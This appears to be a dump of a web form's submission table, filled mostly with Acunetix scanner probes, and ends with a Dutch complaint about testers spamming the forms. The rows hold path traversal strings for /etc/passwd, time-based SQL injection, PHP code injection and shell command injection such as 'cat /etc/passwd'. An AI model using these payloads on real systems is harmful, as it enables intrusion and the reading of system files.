1119 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 acunetix_wvs_invalid_filename 1 1 1 1 1 1 1
1120 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 1 1 1 ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg 1 1
1121 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 and sleep(4) 1
1122 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1'" 1
1123 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 ;print(md5(acunetix_wvs_security_test));
1124 2017-12-08 13:46:32Z 1 1 1 4111111111111111
1125
1126
1127
1128
1129 1 1 1 1 1 1 1 1
1130 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 1 1 1 /../..//../..//../..//../..//../..//etc/passwd.jpg 1 1
1131 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 ';print(md5(acunetix_wvs_security_test));$a='
1132 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 \ 1
1133 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 ||cat /etc/passwd
1134 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 1
1135
1136
1137
1138
1139 1 1 1 1
1140 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 bbg_recv_test.php 1 1 1 1 1 1 1
1141 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 or (sleep(4)+1) limit 1 -- 1
1142 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1xa7 1
1143 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 ";print(md5(acunetix_wvs_security_test));$a="
1144 2017-12-08 13:46:32Z &cat /etc/passwd& 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
1145 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 1 1 1 .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd 1 1
1146 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1' and sleep(4)=' 1
1147 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1
1148
1149
1150
1151
1152 1 1 1 1 1 1
1153 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 bbg_recv_test.php 1 1 1 1 1 1 1
1154 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 1 1 1 /etc/passwd 1 1
1155 2017-12-08 13:46:32Z '&cat /etc/passwd&' 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
1156 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 ${@print(md5(acunetix_wvs_security_test))}
1157 2017-12-08 13:46:32Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 @@1SwIX 1
1158 2017-12-08 13:46:33Z "&cat /etc/passwd&" 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
1159 2017-12-08 13:46:33Z 1 1 1 4111111111111111 1 1 1 1 1 1 ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd 1 1
1160 2017-12-08 13:46:33Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1' and (sleep(4)+1) limit 1 -- 1
1161 2017-12-08 13:46:33Z 1 1 1 4111111111111111 1 1 1 1 1
1162
1163
1164
1165
1166 1 1 1
1167 2017-12-08 13:46:33Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 ${@print(md5(acunetix_wvs_security_test))}\
1168 2017-12-08 13:46:33Z 1 1 1 4111111111111111 1 1 1 1 1 1 ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd 1 1
1169 2017-12-08 13:46:33Z 1 1 1 4111111111111111 1 bbg_recv_test.php/. 1 1 1 1 1 1 1
1170 2017-12-08 13:46:33Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1" and sleep(4)=" 1
1171 2017-12-08 13:46:33Z 1 1 1 4111111111111111 1 1 1 1 1 1 ................etc/passwd 1 1
1172 2017-12-08 13:46:33Z 1 1 1 4111111111111111 1 1 1 1 1 1 1
1173
1174
1175
1176
1177 1
1178 2017-12-08 13:46:33Z
1179
1180 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
1181 2017-12-08 13:46:33Z ;print(md5(acunetix_wvs_security_test)); 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
1182 2017-12-08 13:46:33Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 JyI= 1
1183 2017-12-08 13:46:33Z 1 1 1 4111111111111111 1 1 1 1 1 1 invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././. 1 1
1184 2017-12-08 13:46:33Z `cat /etc/passwd` 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
1185 2017-12-08 13:46:33Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
1186 2017-12-08 13:46:33Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1' or (sleep(4)+1) limit 1 -- 1
1187 2017-12-08 13:46:33Z 1
1188
1189
1190
1191
1192 1 4111111111111111 1 1 1 1 1 1 1 1 1
1193 2017-12-08 13:46:33Z 1 1 1 4111111111111111 1 1 1 1 1 1 file:///etc/passwd 1 1
1194 2017-12-08 13:46:33Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 '" 1
1195 2017-12-08 13:46:33Z ';print(md5(acunetix_wvs_security_test));$a=' 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
1196 2017-12-08 13:46:33Z 1 1 1 4111111111111111 1 1 1 1 1 1 /\../\../\../\../\../\../\../etc/passwd 1 1
1197 2017-12-08 13:46:33Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 ''"" 1
1198 2017-12-08 13:46:33Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1" or (sleep(4)+1) limit 1 -- 1
1199 2017-12-08 13:46:33Z 1 1
1200
1201
1202
1203
1204 4111111111111111 1 1 1 1 1 1 1 1 1
1205 2017-12-08 13:46:33Z |cat /etc/passwd# 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
1206 2017-12-08 13:46:33Z 1 1 1 4111111111111111 1 1 1 1 1 1 acunetix_wvs_invalid_filename 1 1
1207 2017-12-08 13:46:33Z 1 1 1 4111111111111111 1 1 1 1 1 1 WEB-INF/web.xml 1 1
1208 2017-12-08 13:46:33Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
1209 2017-12-08 13:46:33Z '|'ld 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
1210 2017-12-08 13:46:33Z 1 1 1 4111111111111111 1
1211
1212
1213
1214
1215 1 1 1 1 1 1 1
1216 2017-12-08 13:46:33Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1'=sleep(4)=' 1
1217 2017-12-08 13:46:33Z ";print(md5(acunetix_wvs_security_test));$a=" 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
1218 2017-12-08 13:46:33Z 1 1 1 4111111111111111 1 1 1 1 1 1 bbg_recv_test.php 1 1
1219 2017-12-08 13:46:33Z 1 1 1 4111111111111111 1 1 1 1 1 1 WEB-INF\web.xml 1 1
1220 2017-12-08 13:46:33Z "|"ld 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
1221 2017-12-08 13:46:33Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1"=sleep(4)=" 1
1222 2017-12-08 13:46:33Z 1 1'" 1 4111111111111111 1 1 1 1 1 1 1 1 1
1223 2017-12-08 13:46:33Z 1 1 1 4111111111111111 1 1 1 1 1 1
1224
1225
1226
1227
1228 1 1
1229 2017-12-08 13:46:33Z ${@print(md5(acunetix_wvs_security_test))} 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
1230 2017-12-08 13:46:33Z 1 1 1 4111111111111111 1 1 1 ../../../../../../../../../../etc/passwd 1 1 1 1 1
1231 2017-12-08 13:46:33Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1;select pg_sleep(4); -- 1
1232 2017-12-08 13:46:33Z 1 1 1 4111111111111111 1 1 1 1 1 1 bbg_recv_test.php 1 1
1233 2017-12-08 13:46:33Z 1 \ 1 4111111111111111 1 1 1 1 1 1 1 1 1
1234 2017-12-08 13:46:33Z ;cat /etc/passwd; 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
1235 2017-12-08 13:46:33Z 1 1 1 4111111111111111 1 1 1 ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg 1 1 1 1 1
1236 2017-12-08 13:46:33Z 1 1 1 4111111111111111 1 1 1
1237
1238
1239
1240
1241 1 1 1 1 1
1242 2017-12-08 13:46:33Z ${@print(md5(acunetix_wvs_security_test))}\ 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
1243 2017-12-08 13:46:33Z 1 1xa7 1 4111111111111111 1 1 1 1 1 1 1 1 1
1244 2017-12-08 13:46:33Z ';cat /etc/passwd;' 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
1245 2017-12-08 13:46:33Z 1 1 1 4111111111111111 1 1 1 1 1 1 bbg_recv_test.php/. 1 1
1246 2017-12-08 13:46:33Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1';select pg_sleep(4); -- 1
1247 2017-12-08 13:46:33Z 1 1 1 4111111111111111 1 1 1 ../../../../../../../../../../etc/passwd.jpg 1 1 1 1 1
1248 2017-12-08 13:46:33Z 1 @@k1ri1 1 4111111111111111 1 1 1 1 1 1 1 1 1
1249 2017-12-08 13:46:33Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1
1250
1251
1252
1253
1254
1255 2017-12-08 13:46:33Z 1 1 1 '" 1 1 1 1 1 1 1 1 1
1256 2017-12-08 13:46:33Z 1 1 1 4111111111111111 1 1 1 Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n 1 1 1 1 1
1257 2017-12-08 13:46:33Z 1 JyI= 1 4111111111111111 1 1 1 1 1 1 1 1 1
1258 2017-12-08 13:46:33Z ";cat /etc/passwd;" 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
1259 2017-12-08 13:46:33Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
1260 2017-12-08 13:46:33Z 1 '" 1 4111111111111111 1 1 1 1 1 1 1 1 1
1261 2017-12-08 13:46:33Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1; waitfor delay '0:0:4' -- 1
1262 2017-12-08 13:46:33Z 1 1 1 4111111111111111 1 1 1 ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg 1 1 1 1 1
1263 2017-12-08 13:46:33Z ||cat /etc/passwd 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
1264 2017-12-08 13:46:33Z
1265
1266
1267
1268
1269 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
1270 2017-12-08 13:46:33Z 1 1 1
1574 2017-12-18 16:11:19Z 1 1 3.14 Welke idioot had het idee om een acunetix test te draaien? Al dat soort testers spammen de forms vol. -->
1575 2017-12-18 16:11:44Z Welke idioot had het idee om een acunetix test te draaien? Al dat soort testers spammen de forms vol. 1 1 3.14 -->
1576 2017-12-18 16:14:34Z --> 1 1 3.14 -->